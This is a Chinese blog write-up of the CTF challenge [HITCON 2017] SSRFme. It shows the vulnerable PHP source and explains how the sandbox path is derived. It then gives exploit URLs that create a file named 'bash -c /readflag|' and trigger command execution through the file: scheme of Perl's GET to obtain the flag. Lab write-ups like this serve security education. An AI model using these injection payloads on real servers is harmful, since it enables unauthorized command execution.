BUUCTF之[HITCON 2017]SSRFme详解

已于 2022-09-09 19:53:40 修改
阅读量768 收藏 5
点赞数
分类专栏: BUUCTF 文章标签: 网络安全 安全 php
于 2022-09-09 19:29:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62107966/article/details/126780715
版权

题目链接:

BUUCTF在线评测

源码如下:

10.244.80.206 <?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    }

    echo $_SERVER["REMOTE_ADDR"];

    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
    @mkdir($sandbox);
    @chdir($sandbox);

    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
    $info = pathinfo($_GET["filename"]);
    $dir  = str_replace(".", "", basename($info["dirname"]));
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);
    highlight_file(__FILE__);

分析如下:

if语句里是将xff头和ip地址打散后存入一个数组,没啥太大的作用。

 echo $_SERVER["REMOTE_ADDR"]; //返回ip地址。

 $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);//题目提供了沙盒目录,目录名就是sandbox ,md5是将(orangeip地址)这个整体进行加密。

注意加密的时候注意orange和IP地址之间不能有空格,不然就访问不了。

MD5加密网址:MD5在线加密 - MD5加密工具 - MD5在线生成

这里的话先了解下这个加密内容,后面读取flag的时候需要用到,再接着分析:

@mkdir($sandbox);
​@chdir($sandbox);//创建和改变当前沙盒目录

$data = shell_exec("GET " . escapeshellarg($_GET["url"])); //传入url,并通过GET构造shell命令。

$info = pathinfo($_GET["filename"]); //数组的形式输出文件信息。

$dir  = str_replace(".", "", basename($info["dirname"]));//返回文件名

@file_put_contents(basename($info["basename"]), $data);//文件包含shell命令。

GET /读取根目录

?url= /&filename=zhecho //创个目录

给了沙盒目录, $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);

再md5 加密 orangeip地址 MD5在线加密 - MD5加密工具 - MD5在线生成,注意中间不能有空格!!!

/sandbox/fcf2bccafc269c160382150a0166d632/zhecho //访问目录,有个readflag
/?url=file:bash -c /readflag|&filename=bash -c /readflag| //创建一个和readflag相同名字的文件
/?url=file:bash -c /readflag|&filename=aaa //修改存储的文件,并读取flag输入到存储的文件中去。
/sandbox/2eeed2f9aeae6311b507ada8fb98809e/aaa
//访问aaa文件拿到flag。
拿到flag:flag{8294d6b3-efb0-4fc1-b645-94bba15e2606}

泪涌@
关注
专栏目录
2021-10-14 buuctf SSRFme
shallowskyandsea的博客
10-14 229
SSRFme 打开题目,审计代码 前面一段会返回我们的IP,然后会将"orange"和我们的IP拼接后进行MD5加密 通过url参数输入的内容会以GET命令执行, 执行结果会被存入以filename参数的值命名的文件里 构造读取根目录并创建文件a Payload:/?url=/&filename=a Md5加密后的orange+IP:2ba7fe56ffb251699ec6e09ae00f2e87 查看文件 /sandbox/2ba7fe56ffb251699ec6e09.
BMZCTF hitcon_2017_ssrfme
qq_26243045的博客
11-26 627
考点:perl脚本open命令执行 打开题目显示如下代码 将GET请求到的数据保存在我们自定义的文件名当中。 给url参数传递/可以查看根目录下的内容 Perl的open函数执行会执行给open函数所传递的文件名参数中的系统命令,但是前提是这个文件名是需要存在的。 这道题因为文件名是可以控制的,所以就先生成一个以读取flag命令命名的文件 然后使用file协议去读取文件 访问即可获得flag ...
BUUCTF [HITCON 2017]SSRFme 1
weixin_46245411的博客
07-14 2278
文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 说明 题目直接给出了源码,原本以为会很简单,没想到涉及了一大堆的linux命令行的命令执行,看了别人大佬的WP后感动鸭梨山大,但是认真复现后发现受益良多~ 一、代码审计(这里为了不泄露个人信息,就假设了一个IP地址吧) 原本还以为是很简单的XFF漏洞利用,没想到啊~ 127.0.0.1<?php if (isset($_SERVER['HTTP_X_FORW...
[HITCON 2017]SSRFme1
最新发布
alwtj的博客
06-22 970
大概总结一下就是你要传入一个url参数和一个filename参数,url参数会被执行get请求,得到后的内容会被写入到 sandbox/md5(orange.ip)/filename 目录下.首先,通过pathinfo函数解析$_GET["filename"],获取其中的目录名和文件名.然后,它尝试创建一个新的目录(基于目录名,但移除了所有点。最后,使用file_put_contents函数将数据保存到文件中,文件名基于$_GET["filename"]中的基本文件名.不过有一个叫readflag的文件.
[BUUCTF][HITCON 2017]SSRFme
cosmoslin的博客
09-22 283
[BUUCTF][HITCON 2017]SSRFme <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; } echo $_SERVER["REMOTE_ADDR"];
buuctf [HITCON 2017]SSRFme
qq_52671379的博客
04-19 560
buuctf [HITCON 2017]SSRFme
[HITCON 2017]SSRFme
Sk1y的博客
01-14 1009
[HITCON 2017]SSRFme 文章目录[HITCON 2017]SSRFmepathinfo()函数payload参考文章 打开题目,就是源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_hea
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
HITCON2017 babyfirst-revenge v2
forbidd3n,keep going
05-22 578
被5虐过后,现在到4了,没想到难度大很多,这些就记一下总结下来的方法和姿势。先总结ls -t的方法,后面再补充tar的姿势。 1、构造ls -t 在上一题中我们大概知道了构造ls -t的要素,但是在本题中,由于长度的进一步限制,`ls>>_`将无法使用。这就要使用到其他技巧。 技巧0:* 在当前工作目录下使用*命令,会将目录名当作命令执行(顺序) 执行*即-t ...
Hitcon2017 babyfirst-revenge复现
0verWatch的博客
09-06 2833
前言 开学了还是得学习的,复现一波题目来玩玩,其实是实力不够不能去打网鼎杯emmm 正文 先从Hitcon2017 babyfirst-revenge这一个题目,总结一下还是学到很多东西的 复现地址 https://github.com/Pr0phet/hitconDockerfile/tree/master/hitcon-ctf-2017/babyfirst-revenge 这是题目回...
buuctf-[De1CTF 2019]SSRF Me
weixin_43345082的博客
12-30 1070
打开页面就是源码 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefault...
buuctf [网鼎杯 2020 玄武组]SSRFMe
qq_52671379的博客
04-23 3577
buuctf [网鼎杯 2020 玄武组]SSRFMe
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值